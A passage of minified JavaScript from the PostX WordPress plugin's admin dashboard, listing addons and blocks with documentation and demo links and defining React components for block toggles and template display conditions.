Template Addon.","ultimate-post"),img:"divi.svg",is_pro:!1,live:"https://www.wpxpo.com/postx/page-builder-integration/live_demo_args",docs:"https://wpxpo.com/docs/postx/add-on/divi-addon/?utm_source=postx-menu&utm_medium=addons-demo&utm_campaign=postx-dashboard",video:"https://www.youtube.com/watch?v=p9RKTYzqU48",position:20,integration:!0},ultp_custom_font:{name:"Custom Font",desc:__("It allows you to upload custom fonts and use them on any PostX blocks with all typographical options.","ultimate-post"),img:"custom_font.svg",is_pro:!1,live:"https://www.wpxpo.com/wordpress-custom-fonts/live_demo_args",docs:"https://wpxpo.com/docs/postx/add-on/custom-fonts/",video:"https://www.youtube.com/watch?v=tLqUpj_gL-U",position:7},ultp_bricks_builder:{name:"Bricks Builder",desc:__("It lets you use PostX’s Gutenberg blocks in the Bricks Builder by using the Saved Template Addon.","ultimate-post"),img:"bricks.svg",is_pro:!1,live:"https://www.wpxpo.com/postx/page-builder-integration/live_demo_args",docs:"https://wpxpo.com/docs/postx/add-on/bricks-builder-addon/",video:"https://www.youtube.com/watch?v=t0ae3TL48u0",position:20,integration:!0},ultp_beaver_builder:{name:"Beaver",desc:__("It lets you use PostX’s Gutenberg blocks in the Beaver Builder by using the Saved Template Addon.","ultimate-post"),img:"beaver.svg",is_pro:!1,live:"https://www.wpxpo.com/postx/page-builder-integration/live_demo_args",docs:"https://wpxpo.com/docs/postx/add-on/beaver-builder-addon/",video:"https://www.youtube.com/watch?v=aLfI0RkJO6g",position:20,integration:!0},ultp_frontend_submission:{name:"Front End Post Submission",desc:__("Registered/guest writers can submit posts from frontend. Admins can easily manage, review, and publish posts.","ultimate-post"),img:"frontend_submission.svg",docs:"https://wpxpo.com/docs/postx/add-on/front-end-post-submission/",live:"https://www.wpxpo.com/postx/front-end-post-submission/live_demo_args",video:"https://www.youtube.com/watch?v=KofF7BUwNC0",is_pro:!0,position:6,integration:!1},ultp_category:{name:"Taxonomy Image & Color",desc:__("It allows you to add category or taxonomy-specific featured images and colors to make them attractive.","ultimate-post"),is_pro:!0,docs:"https://wpxpo.com/docs/postx/add-on/category-addon/",live:"https://www.wpxpo.com/postx/taxonomy-image-and-color/live_demo_args",video:"https://www.youtube.com/watch?v=cd75q-lJIwg",img:"category-style.svg",position:15},ultp_progressbar:{name:"Progress Bar",desc:__("Display a visual indicator of the reading progression of blog posts and the scrolling progression of pages.","ultimate-post"),img:"progressbar.svg",docs:"https://wpxpo.com/docs/postx/add-on/progress-bar/",live:"https://www.wpxpo.com/postx/progress-bar/live_demo_args",video:"https://www.youtube.com/watch?v=QErQoDhWi4c",is_pro:!0,position:30},ultp_yoast:{name:"Yoast",desc:__("It allows you to display custom meta descriptions added with the Yoast SEO plugin instead of excerpts.","ultimate-post"),img:"yoast.svg",is_pro:!0,live:"https://www.wpxpo.com/postx/seo-meta-support/live_demo_args",docs:"https://wpxpo.com/docs/postx/add-on/seo-meta/",video:"https://www.youtube.com/watch?v=H8x-hHC0JBM",required:{name:"Yoast",slug:"wordpress-seo/wp-seo.php"},position:55,integration:!0},ultp_aioseo:{name:"All in One SEO",desc:__("It allows you to display custom meta descriptions added with the All in One SEO plugin instead of excerpts.","ultimate-post"),img:"aioseo.svg",is_pro:!0,live:"https://www.wpxpo.com/postx/seo-meta-support/live_demo_args",docs:"https://wpxpo.com/docs/postx/add-on/seo-meta/",video:"https://www.youtube.com/watch?v=H8x-hHC0JBM",required:{name:"All in One SEO",slug:"all-in-one-seo-pack/all_in_one_seo_pack.php"},position:35,integration:!0},ultp_rankmath:{name:"Rank Math",desc:__("It allows you to display custom meta descriptions added with the Rank Math plugin instead of excerpts.","ultimate-post"),img:"rankmath.svg",is_pro:!0,live:"https://www.wpxpo.com/postx/seo-meta-support/live_demo_args",docs:"https://wpxpo.com/docs/postx/add-on/seo-meta/",video:"https://www.youtube.com/watch?v=H8x-hHC0JBM",required:{name:"Rank Math",slug:"seo-by-rank-math/rank-math.php"},position:40,integration:!0},ultp_seopress:{name:"SEOPress",desc:__("It allows you to display custom meta descriptions added with the SEOPress plugin instead of excerpts.","ultimate-post"),img:"seopress.svg",is_pro:!0,live:"https://www.wpxpo.com/postx/seo-meta-support/live_demo_args",docs:"https://wpxpo.com/docs/postx/add-on/seo-meta/",video:"https://www.youtube.com/watch?v=H8x-hHC0JBM",required:{name:"SEOPress",slug:"wp-seopress/seopress.php"},position:45,integration:!0},ultp_squirrly:{name:"Squirrly",desc:__("It allows you to display custom meta descriptions added with the Squirrly plugin instead of excerpts.","ultimate-post"),img:"squirrly.svg",is_pro:!0,live:"https://www.wpxpo.com/postx/seo-meta-support/live_demo_args",docs:"https://wpxpo.com/docs/postx/add-on/seo-meta/",video:"https://www.youtube.com/watch?v=H8x-hHC0JBM",required:{name:"Squirrly",slug:"squirrly-seo/squirrly.php"},position:50,integration:!0},ultp_builder:{name:"Dynamic Site Builder",desc:__("The Gutenberg-based Builder allows users to create dynamic templates for Home and all Archive pages.","ultimate-post"),img:"builder-icon.svg",docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",live:"https://www.wpxpo.com/postx/gutenberg-site-builder/live_demo_args",video:"https://www.youtube.com/watch?v=0qQmnUqWcIg",is_pro:!1,position:5},ultp_chatgpt:{name:"ChatGPT",desc:__("PostX brings the ChatGPT into the WordPress Dashboard to let you generate content effortlessly.","ultimate-post"),img:"ChatGPT.svg",docs:"https://wpxpo.com/docs/postx/add-on/chatgpt-addon/",live:"https://www.wpxpo.com/postx-chatgpt-wordpress-ai-content-generator/live_demo_args",video:"https://www.youtube.com/watch?v=NE4BPw4OTAA",is_pro:!1,position:6}}},7191:(e,t,n)=>{"use strict";n.d(t,{Z:()=>s});var a=n(7294),r=n(1383),o=n(8949),i=n(356);n(563);const{__}=wp.i18n,l={grid:{label:__("Post Grid Blocks","ultimate-post"),attr:{post_grid_1:{label:__("Post Grid #1","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6829",docs:"https://wpxpo.com/docs/postx/all-blocks/post-grid-1/",icon:"post-grid-1.svg"},post_grid_2:{label:__("Post Grid #2","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6830",docs:"https://wpxpo.com/docs/postx/all-blocks/post-grid-2/",icon:"post-grid-2.svg"},post_grid_3:{label:__("Post Grid #3","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6831",docs:"https://wpxpo.com/docs/postx/all-blocks/post-grid-3/",icon:"post-grid-3.svg"},post_grid_4:{label:__("Post Grid #4","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6832",docs:"https://wpxpo.com/docs/postx/all-blocks/post-grid-4/",icon:"post-grid-4.svg"},post_grid_5:{label:__("Post Grid #5","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6833",docs:"https://wpxpo.com/docs/postx/all-blocks/post-grid-5/",icon:"post-grid-5.svg"},post_grid_6:{label:__("Post Grid #6","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6834",docs:"https://wpxpo.com/docs/postx/all-blocks/post-grid-6/",icon:"post-grid-6.svg"},post_grid_7:{label:__("Post Grid #7","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6835",docs:"https://wpxpo.com/docs/postx/all-blocks/post-grid-7/",icon:"post-grid-7.svg"}}},list:{label:__("Post List Blocks","ultimate-post"),attr:{post_list_1:{label:__("Post List #1","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6836",docs:"https://wpxpo.com/docs/postx/all-blocks/post-list-1/",icon:"post-list-1.svg"},post_list_2:{label:__("Post List #2","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6837",docs:"https://wpxpo.com/docs/postx/all-blocks/post-list-2/",icon:"post-list-2.svg"},post_list_3:{label:__("Post List #3","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6838",docs:"https://wpxpo.com/docs/postx/all-blocks/post-list-3/",icon:"post-list-3.svg"},post_list_4:{label:__("Post List #4","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6839",docs:"https://wpxpo.com/docs/postx/all-blocks/post-list-4/",icon:"post-list-4.svg"}}},slider:{label:__("Post Slider Blocks","ultimate-post"),attr:{post_slider_1:{label:__("Post Slider #1","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6840",docs:"https://wpxpo.com/docs/postx/all-blocks/post-slider-1/",icon:"post-slider-1.svg"},post_slider_2:{label:__("Post Slider #2","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid7487",docs:"https://wpxpo.com/docs/postx/all-blocks/post-slider-2/",icon:"post-slider-2.svg"}}},other:{label:__("Others PostX Blocks","ultimate-post"),attr:{menu:{label:__("Menu - PostX","ultimate-post"),default:!0,live:"https://www.wpxpo.com/introducing-postx-mega-menu/",docs:"https://wpxpo.com/docs/postx/postx-menu/",icon:"/menu/menu.svg"},post_module_1:{label:__("Post Module #1","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6825",docs:"https://wpxpo.com/docs/postx/all-blocks/post-module-1/",icon:"post-module-1.svg"},post_module_2:{label:__("Post Module #2","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6827",docs:"https://wpxpo.com/docs/postx/all-blocks/post-module-2/",icon:"post-module-2.svg"},heading:{label:__("Heading","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6842",docs:"https://wpxpo.com/docs/postx/all-blocks/heading-blocks/",icon:"heading.svg"},image:{label:__("Image","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6843",docs:"https://wpxpo.com/docs/postx/all-blocks/image-blocks/",icon:"image.svg"},taxonomy:{label:__("Taxonomy","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6841",docs:"https://wpxpo.com/docs/postx/all-blocks/taxonomy-1/",icon:"ultp-taxonomy.svg"},wrapper:{label:__("Wrapper","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6844",docs:"https://wpxpo.com/docs/postx/all-blocks/wrapper/",icon:"wrapper.svg"},news_ticker:{label:__("News Ticker","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6845",docs:"https://wpxpo.com/docs/postx/all-blocks/news-ticker-block/",icon:"news-ticker.svg"},advanced_list:{label:__("List - PostX","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid7994",docs:"https://wpxpo.com/docs/postx/all-blocks/list-block/",icon:"advanced-list.svg"},button_group:{label:__("Button Group","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid7952",docs:"https://wpxpo.com/docs/postx/all-blocks/button-block/",icon:"button-group.svg"},row:{label:__("Row","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx-row-column-block/",docs:"https://wpxpo.com/docs/postx/postx-features/row-column/",icon:"row.svg"},advanced_search:{label:__("Search - PostX","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid8233",docs:"https://wpxpo.com/docs/postx/all-blocks/search-block",icon:"advanced-search.svg"},dark_light:{label:__("Dark Light","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid8233",docs:"https://wpxpo.com/docs/postx/all-blocks/search-block",icon:"advanced-search.svg"},star_ratings:{label:__("Star Rating","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid8858",icon:"star-rating.svg"},accordion:{label:__("Accordion","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid8851",docs:"https://wpxpo.com/docs/postx/all-blocks/accordion-block/",icon:"accordion.svg"},tabs:{label:__("Tabs","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid9045",docs:"https://wpxpo.com/docs/postx/all-blocks/tabs-block/",icon:"tabs.svg"},gallery:{label:__("PostX Gallery","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid8951",docs:"https://wpxpo.com/docs/postx/all-blocks/postx-gallery-block/",icon:"gallery.svg"},youtube_gallery:{label:__("Youtube Gallery","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid9096",docs:"https://wpxpo.com/docs/postx/all-blocks/youtube-gallery-block/",icon:"youtube-gallery.svg"}}},builder:{label:__("Site Builder Blocks","ultimate-post"),attr:{builder_post_title:{label:__("Post Title","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/post_title.svg"},builder_advance_post_meta:{label:__("Advance Post Meta","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/post_meta.svg"},builder_archive_title:{label:__("Archive Title","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"archive-title.svg"},builder_author_box:{label:__("Post Author Box","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/author_box.svg"},builder_post_next_previous:{label:__("Post Next Previous","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/next_previous.svg"},builder_post_author_meta:{label:__("Post Author Meta","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/author.svg"},builder_post_breadcrumb:{label:__("Post Breadcrumb","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/breadcrumb.svg"},builder_post_category:{label:__("Post Category","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/category.svg"},builder_post_comment_count:{label:__("Post Comment Count","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/comment_count.svg"},builder_post_comments:{label:__("Post Comments","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/comments.svg"},builder_post_content:{label:__("Post Content","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/content.svg"},builder_post_date_meta:{label:__("Post Date Meta","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/post_date.svg"},builder_post_excerpt:{label:__("Post Excerpt","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/excerpt.svg"},builder_post_featured_image:{label:__("Post Featured Image/Video","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/featured_img.svg"},builder_post_reading_time:{label:__("Post Reading Time","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/reading_time.svg"},builder_post_social_share:{label:__("Post Social Share","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/share.svg"},builder_post_tag:{label:__("Post Tag","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/post_tag.svg"},builder_post_view_count:{label:__("Post View Count","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/view_count.svg"}}}},s=()=>{const[e,t]=(0,a.useState)({}),[n,s]=(0,a.useState)({state:!1,status:""}),[p,c]=(0,a.useState)(!1),d=(0,r.t)();(0,a.useEffect)((()=>{u()}),[]);const u=()=>{c(!0),wp.apiFetch({path:"/ultp/v2/get_all_settings",method:"POST",data:{key:"key",value:"value"}}).then((e=>{e.success&&d.current&&(t(e.settings),c(!1))}))};return(0,a.createElement)("div",{className:"ultp-dashboard-blocks-container"},n.state&&(0,a.createElement)(i.Z,{delay:2e3,toastMessages:n,setToastMessages:s}),Object.keys(l).map(((n,r)=>{const i=l[n];return(0,a.createElement)("div",{className:"ultp-dashboard-blocks-group",key:r},p?(0,a.createElement)(a.Fragment,null,(0,a.createElement)(o.Z,{type:"custom_size",c_s:{size1:180,unit1:"px",size2:32,unit2:"px",br:4}}),(0,a.createElement)("div",{className:"ultp-dashboard-group-blocks"},Array(3).fill(1).map(((e,t)=>(0,a.createElement)("div",{className:"ultp-dashboard-group-blocks-item ultp-dash-item-con",key:t},(0,a.createElement)("div",{className:"ultp-blocks-item-meta"},(0,a.createElement)(o.Z,{type:"custom_size",c_s:{size1:22,unit1:"px",size2:25,unit2:"px",br:4}}),(0,a.createElement)(o.Z,{type:"custom_size",c_s:{size1:100,unit1:"px",size2:20,unit2:"px",br:2}})),(0,a.createElement)("div",{className:"ultp-blocks-control-option ultp-dash-control-options"},(0,a.createElement)(o.Z,{type:"custom_size",c_s:{size1:46,unit1:"px",size2:20,unit2:"px",br:2}}),(0,a.createElement)(o.Z,{type:"custom_size",c_s:{size1:40,unit1:"px",size2:20,unit2:"px",br:2}}),(0,a.createElement)(o.Z,{type:"custom_size",c_s:{size1:36,unit1:"px",size2:20,unit2:"px",br:8}}))))))):(0,a.createElement)(a.Fragment,null,(0,a.createElement)("div",{className:"ultp_h5"},i.label),(0,a.createElement)("div",{className:"ultp-dashboard-group-blocks"},Object.keys(i.attr).map(((n,r)=>{const o=i.attr[n];let l=!!o.default;return""==e[n]&&(l="yes"==e[n]),(0,a.createElement)("div",{className:"ultp-dashboard-group-blocks-item ultp-dash-item-con",key:r},(0,a.createElement)("div",{className:"ultp-blocks-item-meta"},(0,a.createElement)("img",{src:`${ultp_dashboard_pannel.url}assets/img/blocks/${o.icon}`,alt:o.label}),(0,a.createElement)("div",null,o.label)),(0,a.createElement)("div",{className:"ultp-blocks-control-option ultp-dash-control-options"},o.docs&&(0,a.createElement)("a",{href:o.docs+"?utm_source=db-postx-blocks&utm_medium=docs&utm_campaign=postx-dashboard",className:"ultp-option-tooltip",target:"_blank",rel:"noreferrer"},(0,a.createElement)("div",{className:"dashicons dashicons-media-document"}),__("Docs","ultimate-post")),o.live&&(0,a.createElement)("a",{href:o.live,className:"ultp-option-tooltip",target:"_blank",rel:"noreferrer"},(0,a.createElement)("div",{className:"dashicons dashicons-external"}),__("Live","ultimate-post")),(0,a.createElement)("input",{type:"checkbox",className:"ultp-blocks-enable",id:n,checked:l,onChange:()=>{(n=>{const a=e?.hasOwnProperty(n)&&"yes"!=e[n]?"yes":"";t({...e,[n]:a}),wp.apiFetch({path:"/ultp/v2/addon_block_action",method:"POST",data:{key:n,value:a}}).then((e=>{e.success&&s({status:"success",messages:[e.message],state:!0})}))})(n)}}),(0,a.createElement)("label",{className:"ultp-control__label",htmlFor:n})))})))))})))}},4872:(e,t,n)=>{"use strict";n.d(t,{Z:()=>i});var a=n(7294),r=n(1078),o=n(6765);const{__}=wp.i18n,i=e=>{const{id:t,type:n,settings:i,defaults:l,setShowCondition:s}=e,[p,c]=(0,a.useState)(t&&void 0!==i[n]&&void 0!==i[n][t]?i[n][t]:["include/"+n]),[d,u]=(0,a.useState)({reload:!1,dataSaved:!1});return(0,a.createElement)("div",{className:"ultp-modal-content"},(0,a.createElement)("div",{className:"ultp-condition-wrap"},(0,a.createElement)("div",{className:"ultp_h3"},__("Where Do You Want to Display Your Template?","ultimate-post")),(0,a.createElement)("p",{className:"ultp-description"},__("Set the conditions that determine where your Template is used throughout your site.","ultimate-post")),(0,a.createElement)("div",{className:"ultp-condition-items"},p.map(((e,i)=>{if(e)return(0,a.createElement)("div",{key:i,className:"ultp-condition-wrap__field"},"header"==n||"footer"==n?(0,a.createElement)(r.Z,{key:e,id:t,index:i,type:n,value:e,defaults:l,setChange:(e,t)=>{u({dataSaved:!1});let n=JSON.parse(JSON.stringify(p));n[t]=e,c(n)}}):(0,a.createElement)(o.Z,{key:e,id:t,index:i,type:n,value:e,defaults:l,setChange:(e,t)=>{u({dataSaved:!1});let n=JSON.parse(JSON.stringify(p));n[t]=e,c(n)}}),(0,a.createElement)("span",{className:"dashicons dashicons-no-alt ultp-condition_cancel",onClick:()=>{u({dataSaved:!1});let e=JSON.parse(JSON.stringify(p));e.splice(i,1),c(e)}}))}))),(0,a.createElement)("button",{className:"btnCondition cursor",onClick:()=>{const e="singular"==n?"include/singular/post":"header"==n||"footer"==n?"include/"+n+"/entire_site":"include/"+n;c([...p,e])}},__("Add Conditions","ultimate-post"))),(0,a.createElement)("button",{className:"ultp-save-condition cursor",onClick:()=>{u({reload:!0});let e=Object.assign({},i);void 0!==e[n]||(e[n]={}),e[n][t]=p.filter((e=>e)),wp.apiFetch({path:"/ultp/v2/condition_save",method:"POST",data:{settings:e}}).then((e=>{e.success&&(u({reload:!1,dataSaved:!0}),setTimeout((function(){u({reload:!1,dataSaved:!1}),s&&s("")}),2e3))}))}},d.dataSaved?"Condition Saved.":"Save Condition",(0,a.createElement)("span",{style:{visibility:d.reload?"visible":"hidden"},className:"dashicons dashicons-update rotate ultp-builder-import"})))}},1078:(e,t,n)=>{"use strict";n.d(t,{Z:()=>r});var a=n(7294);const r=e=>{const t=(0,a.useRef)(),{value:n,type:r,defaults:o,setChange:i,index:l}=e,s=n.split("/"),[p,c]=(0,a.useState)([]),[d,u]=(0,a.useState)(!1),[m,f]=(0,a.useState)(!1),[h,g]=(0,a.useState)(s[2]||""),[v,_]=(0,a.useState)(""),w=e=>{null!=t.current&&(t.current.contains(e.target)||u(!1))};(0,a.useEffect)((()=>(s[4]?x(s[4],!0):b(),document.addEventListener("mousedown",w),()=>document.removeEventListener("mousedown",w))),[]);const b=()=>{let e="";const t=s[3];return t&&o[s[2]]&&o[s[2]].forEach((n=>{n.value==t?(e=n.search,f(!0)):n.attr&&n.attr.forEach((n=>{n.value==t&&(e=n.search,f(!0))}))})),e},x=(e,t)=>{wp.apiFetch({path:"/ultp/v2/condition",method:"POST",data:{type:b(),term:e,title_return:t}}).then((e=>{e.success&&(t?_(e.data):c(e.data))}))};return(0,a.createElement)("div",{className:"ultp-condition-fields"},(0,a.createElement)("select",{value:s[0]||"include",onChange:e=>{s.splice(0,1,e.target.value),i(s.join("/"),l)}},(0,a.createElement)("option",{value:"include"},"Include"),(0,a.createElement)("option",{value:"exclude"},"Exclude")),(0,a.createElement)("select",{value:s[2]||"entire_site",onChange:e=>{s.splice(2,1,e.target.value||"entire_site"),s.splice(3),"singular"==e.target.value&&s.push("post"),i(s.join("/"),l)}},o[r].map(((e,t)=>(0,a.createElement)("option",{key:t,value:e.value},e.label)))),s[2]&&"entire_site"!=s[2]&&(0,a.createElement)(a.Fragment,null,(0,a.createElement)("select",{value:s[3]||"",onChange:e=>{const t=e.target.options[e.target.options.selectedIndex].dataset.search;f(!!t),g(""),c([]),s.splice(3,1,e.target.value),s.splice(e.target.value?4:3);const n=s.filter((function(e){return e}));i(n.join("/"),l)}},o[s[2]]&&o[s[2]].map(((e,t)=>e.attr?(0,a.createElement)("optgroup",{label:e.label,key:t},e.attr.map(((e,t)=>!e.attr&&(0,a.createElement)("option",{value:e.value,"data-search":e.search,key:t},e.label)))):(0,a.createElement)("option",{value:e.value,"data-search":e.search,key:t},e.label)))),(m||s[4])&&(0,a.createElement)("div",{ref:t,className:"ultp-condition-dropdown"},(0,a.createElement)("div",{onClick:()=>u(!0),className:`ultp-condition-text ${h&&"ultp-condition-dropdown__content"}`},h&&v?(0,a.createElement)(a.Fragment,null,(0,a.createElement)("span",{className:"ultp-condition-dropdown__label"},v,(0,a.createElement)("span",{className:"dashicons dashicons-no-alt ultp-dropdown-value__close",onClick:()=>{f(!0),g(""),s.splice(4,1,"");const e=s.filter((function(e){return e}));i(e.join("/"),l)}}))):(0,a.createElement)("span",{className:"ultp-condition-dropdown__default"}," ","All"," "),(0,a.createElement)("span",{className:"ultp-condition-arrow dashicons dashicons-arrow-down-alt2"})),d&&(0,a.createElement)("div",{className:"ultp-condition-search"},(0,a.createElement)("input",{type:"text",name:"search",autoComplete:"off",placeholder:"Search",onChange:e=>{x(e.target.value,!1)}}),p.length>0&&(0,a.createElement)("ul",null,p.map(((e,t)=>(0,a.createElement)("li",{key:t,onClick:()=>{u(!1),g(e.value),_(e.title),s.splice(4,1,e.value),i(s.join("/"),l)}},e.title))))))))}},6765:(e,t,n)=>{"use strict";n.d(t,{Z:()=>r});var a=n(7294);const r=e=>{const t=(0,a.useRef)(),{value:n,type:r,defaults:o,setChange:i,index:l}=e,s=n.split("/"),[p,c]=(0,a.useState)([]),[d,u]=(0,a.useState)(!1),[m,f]=(0,a.useState)(!1),[h,g]=(0,a.useState)(s[2]||""),[v,_]=(0,a.useState)(""),w=e=>{null!=t.current&&(t.current.contains(e.target)||u(!1))};(0,a.useEffect)((()=>(s[3]?x(s[3],!0):b(),document.addEventListener("mousedown",w),()=>document.removeEventListener("mousedown",w))),[]);const b=()=>{let e="";const t=s[2];return t&&o[r]&&o[r].forEach((n=>{n.value==t?(e=n.search,f(!0)):n.attr&&n.attr.forEach((n=>{n.value==t&&(e=n.search,f(!0))}))})),e},x=(e,t)=>{wp.apiFetch({path:"/ultp/v2/condition",method:"POST",data:{type:b(),term:e,title_return:t}}).then((e=>{e.success&&(t?_(e.data):c(e.data))}))};return(0,a.createElement)("div",{className:"ultp-condition-fields"},(0,a.createElement)("select",{value:s[0]||"include",onChange:e=>{s[0]=e.target.value,i(s.join("/"),l)}},(0,a.createElement)("option",{value:"include"},"Include"),(0,a.createElement)("option",{value:"exclude"},"Exclude")),(0,a.createElement)("select",{value:s[2]||"post",onChange:e=>{const t=e.target.options[e.target.options.selectedIndex].dataset.search;f(!!t),g(""),c([]),s[2]=e.target.value;const n=s.filter((function(e){return e}));i(n.join("/"),l)}},o[r]&&o[r].map(((e,t)=>e.attr?(0,a.createElement)("optgroup",{label:e.label,key:t},e.attr.map(((e,t)=>(0,a.createElement)("option",{value:e.value,"data-search":e.search,key:t},e.label)))):(0,a.createElement)("option",{value:e.value,"data-search":e.search,key:t},e.label)))),(m||s[3])&&(0,a.createElement)("div",{ref:t,className:"ultp-condition-dropdown"},(0,a.createElement)("div",{onClick:()=>u(!0),className:`ultp-condition-text ${h&&"ultp-condition-dropdown__content"}`},h&&v?(0,a.createElement)(a.Fragment,null,(0,a.createElement)("span",{className:"ultp-condition-dropdown__label"},v,(0,a.createElement)("span",{className:"dashicons dashicons-no-alt ultp-dropdown-value__close",onClick:()=>{f(!0),g(""),s[3]="";const e=s.filter((function(e){return e}));i(e.join("/"),l)}}))):(0,a.createElement)("span",{className:"ultp-condition-dropdown__default"}," ","All"," "),(0,a.createElement)("span",{className:"ultp-condition-arrow dashicons dashicons-arrow-down-alt2"})),d&&(0,a.createElement)("div",{className:"ultp-condition-search"},(0,a.createElement)("input",{type:"text",name:"search",autoComplete:"off",placeholder:"Search",onChange:e=>{x(e.target.value,!1)}}),p.length>0&&(0,a.createElement)("ul",null,p.map(((e,t)=>(0,a.createElement)("li",{key:t,onClick:()=>{u(!1),g(e.value),_(e.title),s[3]=e.value,i(s.join("/"),l)}},e.title)))))))}},8351:(e,t,n)=>{"use strict";n.d(t,{Z:()=>d});var a=n(7462),r=n(7294),o=n(1383),i=n(4766),l=n(356),s=n(4482),p=n(8949),c=n(4872);n(3493);const{__}=wp.i18n,d=e=>{const t=e.has_ultp_condition?ultp_condition:ultp_dashboard_pannel,{notEditor:n}=e,d=["singular","archive","category","search","author","post_tag","date","header","footer","404"],[u,m]=(0,r.useState)(""),[f,h]=(0,r.useState)([]),[g,v]=(0,r.useState)("all"),[_,w]=(0,r.useState)(!1),[b,x]=(0,r.useState)([]),[y,k]=(0,r.useState)(n||""),[E,C]=(0,r.useState)([]),[S,M]=(0,r.useState)(!1),[L,N]=(0,r.useState)(""),[Z,P]=(0,r.useState)([]),[z,A]=(0,r.useState)(""),[B,H]=(0,r.useState)(!1),[T,R]=(0,r.useState)(!1),[O,j]=(0,r.useState)(!1),[V,F]=(0,r.useState)(""),[W,D]=(0,r.useState)(!1),I="yes"==n?wp.data.select("core/editor").getCurrentPostId():"",[U,$]=(0,r.useState)([]),[G,q]=(0,r.useState)(!1),[K,X]=(0,r.useState)({state:!1,status:""}),Q=(0,o.t)(),J=async()=>{await wp.apiFetch({path:"/ultp/v2/fetch_premade_data",method:"POST",data:{type:"starter_lists"}}).then((e=>{if(e.success&&e.data){const t=JSON.parse(e.data);Y(t)}}))},Y=e=>{const t=[],n=[];e.forEach((e=>{e.templates.forEach((a=>{const r={...a,parentID:e.ID};r.hasOwnProperty("home_page")&&"home_page"==r.home_page&&t.push(r),"ultp_builder"==r.type&&n.push(r)}))})),P(n),$(t)},ee=async()=>{await wp.apiFetch({path:"/ultp/v2/data_builder",method:"POST",data:{pid:I}}).then((e=>{e.success&&Q.current&&(h(e.postlist),x(e.settings),C(e.defaults),m(e.type),j(!0),J())}))};(0,r.useEffect)((()=>(ee(),document.addEventListener("mousedown",ne),()=>document.removeEventListener("mousedown",ne))),[]);const te=(e,t)=>{wp.apiFetch({path:"/ultp/v2/get_single_premade",method:"POST",data:{type:L,ID:e,apiEndPoint:t}}).then((e=>{e.success?(A(""),window.open(e?.link?.replaceAll("&amp;","&"))):(H(!0),A(""),R(!0))}))},ne=e=>{e.target&&!e.target.classList?.contains("ultp-reserve-button")&&(F(""),D(!1))},ae=(e,n)=>{const a=`https://postxkit.wpxpo.com/${e.live}/wp-content/uploads/sites/${e.parentID}/postx_importer_img/pages/${e.name.toLowerCase().replaceAll(" ","_")}.jpg`,o="https://postxkit.wpxpo.com/"+(["header","footer","front_page"].includes(L)?e.live:e.live+"/postx_"+("archive"==e.builder_type?e.archive_type:e.builder_type));return(0,r.createElement)("div",{key:n,className:"ultp-item-list 